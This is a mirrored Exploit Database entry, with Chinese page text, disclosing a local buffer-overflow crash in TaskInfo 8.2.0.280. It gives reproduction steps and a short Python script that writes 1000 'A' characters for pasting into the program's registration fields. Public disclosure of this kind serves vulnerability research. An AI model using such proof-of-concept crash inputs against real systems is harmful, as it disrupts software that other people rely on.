TaskInfo 8.2.0.280 – Denial of Service (PoC)

Exploit Database
93 阅读

作者： Rafael Pedrero

日期： 2019-02-04
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/46314/

# Exploit Title: TaskInfo v8.2.0.280 - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2019-01-30
# Vendor Homepage: http://www.iarsn.com/
# Software Link : http://www.iarsn.com/
# Tested Version: v8.2.0.280
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow

# Steps to Produce the Crash:
# 1.- Run TaskInfo.exe
# 2.- copy content TaskInfo_Crash.txt to clipboard (result from this python script)
# 3.- Go to "Help" - "Registration" - "Set or View Registration Information" and paste the result in the "New User Name:" and "New Serial Number:" textbox.
# 4.- Click in OK button and you will see a crash.


#!/usr/bin/env python


crash = "\x41" * 1000
f = open ("TaskInfo_Crash.txt", "w")
f.write(crash)
f.close()

last Exploits
TaskInfo 8.2.0.280 – Denial of Service (PoC)的更多信息

Able2Doc and Able2Doc Professional 6.0 – Memory Corruption：
Battlefield 2/2142 – Packet Null Pointer Dereference Remote Denial of Service：
Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 – Multiple Vulnerabilities：
Grindr 2.1.1 iOS – Denial of Service：
Java Web Start Launcher ActiveX Control – Memory Corruption：
WebKit – Universal XSS in JSObject::putInlineSlow and JSValue::putToPrimitive：
Microsoft Office 2007 – ‘msxml5.dll’ Crash (PoC)：
QNap QVR Client 5.1.0.11290 – Crash (PoC)：